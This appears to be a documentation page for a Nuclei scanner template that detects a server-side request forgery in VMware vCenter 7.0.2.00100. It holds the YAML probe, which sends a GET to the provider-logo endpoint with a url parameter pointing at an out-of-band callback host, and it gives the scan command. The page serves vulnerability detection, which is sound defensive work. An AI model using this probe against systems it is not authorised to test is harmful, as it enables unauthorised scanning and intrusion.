VMware vCenter - Server-Side Request Forgery/Local File Inclusion/Cross-Site Scripting
ID: vmware-vcenter-ssrf
Severity: critical
Author: pdteam
Tags: ssrf,lfi,xss,oast,vcenter,vmware
Description
Section titled “Description”VMware vCenter 7.0.2.00100 is susceptible to multiple vulnerabilities including server-side request forgery, local file inclusion, and cross-site scripting.
YAML Source
Section titled “YAML Source”id: vmware-vcenter-ssrf
info: name: VMware vCenter - Server-Side Request Forgery/Local File Inclusion/Cross-Site Scripting author: pdteam severity: critical description: VMware vCenter 7.0.2.00100 is susceptible to multiple vulnerabilities including server-side request forgery, local file inclusion, and cross-site scripting. reference: - https://github.com/l0ggg/VMware_vCenter metadata: max-request: 1 tags: ssrf,lfi,xss,oast,vcenter,vmware
http: - method: GET path: - "{{BaseURL}}/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=https://{{interactsh-url}}"
matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "http"
- type: word part: interactsh_request words: - "User-Agent: Java"# digest: 4b0a00483046022100a966511d23c2e515b0a0b5b6573b9f8dd2501d59b3d32896eb7c99ed9e558a530221009530b3e8217549d8bb7604264159dde2bb0b8874e6cd5aba58b8cf65d3b9e571:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/vulnerabilities/vmware/vmware-vcenter-ssrf.yaml"